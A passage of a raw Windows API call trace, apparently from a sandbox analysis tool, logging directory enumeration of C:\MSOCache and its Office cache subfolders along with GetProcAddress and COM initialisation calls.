ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0131.210] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x66aefa4 | out: lpFindFileData=0x66aefa4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.210] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x66aefa4 | out: lpFindFileData=0x66aefa4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0131.210] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0131.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x66af22c) returned 1 [0131.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x66af238) returned 1 [0131.211] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0131.211] CoUninitialize () [0131.213] SysReAllocStringLen (in: pbstr=0x66af8f0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x66af8f0*="KERNEL32.DLL") returned 1 [0131.213] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.213] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.216] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 130 os_tid = 0x674 [0131.281] SysReAllocStringLen (in: pbstr=0x69df46c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x69df46c*="KERNEL32.DLL") returned 1 [0131.281] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.281] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.284] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.285] SysReAllocStringLen (in: pbstr=0x69df46c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x69df46c*="KERNEL32.DLL") returned 1 [0131.285] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.285] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.288] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.288] SysReAllocStringLen (in: pbstr=0x69df448*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x69df448*="KERNEL32.DLL") returned 1 [0131.288] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.289] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.292] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0131.294] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.295] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0131.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69df01c) returned 1 [0131.296] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x69deb24, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0131.296] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\", nBufferLength=0x105, lpBuffer=0x69deaf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\", lpFilePart=0x0) returned 0xc [0131.296] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x69ded44 | out: lpFindFileData=0x69ded44*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ac30 [0131.297] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x69ded54 | out: lpFindFileData=0x69ded54*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.297] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x69ded54 | out: lpFindFileData=0x69ded54*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0131.297] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x69ded54 | out: lpFindFileData=0x69ded54*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 0 [0131.298] FindClose (in: hFindFile=0x77ac30 | out: hFindFile=0x77ac30) returned 1 [0131.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69defdc) returned 1 [0131.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69defe8) returned 1 [0131.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69df01c) returned 1 [0131.298] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x69deb24, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0131.298] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\", nBufferLength=0x105, lpBuffer=0x69deaf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\", lpFilePart=0x0) returned 0xc [0131.298] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x69ded44 | out: lpFindFileData=0x69ded44*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ac30 [0131.298] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x69ded54 | out: lpFindFileData=0x69ded54*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.299] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x69ded54 | out: lpFindFileData=0x69ded54*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0131.299] FindNextFileW (in: hFindFile=0x77ac30, lpFindFileData=0x69ded54 | out: lpFindFileData=0x69ded54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.299] FindClose (in: hFindFile=0x77ac30 | out: hFindFile=0x77ac30) returned 1 [0131.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69defdc) returned 1 [0131.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69defe8) returned 1 [0131.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69defcc) returned 1 [0131.299] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users", nBufferLength=0x105, lpBuffer=0x69dead4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users", lpFilePart=0x0) returned 0x15 [0131.299] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\", nBufferLength=0x105, lpBuffer=0x69deaa8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\", lpFilePart=0x0) returned 0x16 [0131.299] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x69decf4 | out: lpFindFileData=0x69decf4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77abf0 [0131.430] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.509] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0131.509] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0131.509] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0131.509] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0131.510] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0131.510] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0131.510] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0131.510] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0131.510] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0131.510] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0131.511] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0131.511] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0131.511] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0131.511] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0131.511] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0131.512] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0131.512] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0131.512] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0131.512] FindClose (in: hFindFile=0x77abf0 | out: hFindFile=0x77abf0) returned 1 [0131.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69def8c) returned 1 [0131.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69def98) returned 1 [0131.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69defcc) returned 1 [0131.513] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users", nBufferLength=0x105, lpBuffer=0x69dead4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users", lpFilePart=0x0) returned 0x15 [0131.513] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\", nBufferLength=0x105, lpBuffer=0x69deaa8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\", lpFilePart=0x0) returned 0x16 [0131.513] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x69decf4 | out: lpFindFileData=0x69decf4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77abf0 [0131.514] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.514] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0131.515] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0131.515] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0131.515] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0131.515] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x69ded04 | out: lpFindFileData=0x69ded04*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, 